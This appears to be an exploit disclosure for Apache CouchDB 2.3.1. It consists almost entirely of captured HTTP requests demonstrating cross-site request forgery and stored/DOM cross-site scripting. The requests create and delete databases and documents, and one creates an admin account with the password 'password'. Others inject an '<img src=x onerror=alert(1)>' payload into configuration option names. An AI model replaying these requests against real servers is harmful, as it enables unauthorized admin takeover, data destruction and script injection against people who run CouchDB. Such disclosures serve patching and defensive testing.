Apache CouchDB version 2.3.1 suffers from cross site request forgery and cross site scripting vulnerabilities.
c43549d46baa5f2c1232261a06a4ddc5
##################################################################################################################################
# Exploit Title: Apache CouchDB 2.3.1 | Cross-Site Request Forgery /
Cross-Site Scripting
# Date: 22.03.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: http://couchdb.apache.org
# Software Link: http://couchdb.apache.org/#download
# Version: 2.3.1
##################################################################################################################################
Introduction
A CouchDB server hosts named databases, which store documents. Each
document is uniquely named in the database, and CouchDB provides a RESTful
HTTP API for reading and updating (add, edit, delete) database documents.
#################################################################################
Vulnerabilities: CSRF | XSS DOM Based & Reflected & Stored
#################################################################################
CSRF1
Create Database
PUT /test HTTP/1.1
Host: 127.0.0.1:5984
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:5984/_utils/
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 27
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249
{"id":"test","name":"test"}
#################################################################################
CSRF2
Delete Database
DELETE /test HTTP/1.1
Host: 127.0.0.1:5984
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:5984/_utils/
content-type: application/json
pragma: no-cache
Origin: http://127.0.0.1:5984
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249
Cache-Control: max-age=0
#################################################################################
CSRF3
Create Document
POST /test/ HTTP/1.1
Host: 127.0.0.1:5984
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:5984/_utils/
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 18
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249
{"testdoc":"test"}
#################################################################################
CSRF4
Create Admin
PUT /_node/couchdb@localhost/_config/admins/admin HTTP/1.1
Host: 127.0.0.1:5984
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:5984/_utils/
content-type: application/json
pragma: no-cache
Origin: http://127.0.0.1:5984
Content-Length: 10
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249
Cache-Control: max-age=0
"password"
#################################################################################
CSRF5 & XSS1 | DOM Based & Stored - Add Option
PUT /_node/couchdb@localhost/_config/test/%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E
HTTP/1.1
Host: 127.0.0.1:5984
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:5984/_utils/
content-type: application/json
pragma: no-cache
Origin: http://127.0.0.1:5984
Content-Length: 6
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249
Cache-Control: max-age=0
"test"
#################################################################################
CSRF6 & XSS2 | DOM Based & Stored - Delete Option
DELETE /_node/couchdb@localhost/_config/test/%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E
HTTP/1.1
Host: 127.0.0.1:5984
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:5984/_utils/
content-type: application/json
pragma: no-cache
Origin: http://127.0.0.1:5984
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249
Cache-Control: max-age=0
#################################################################################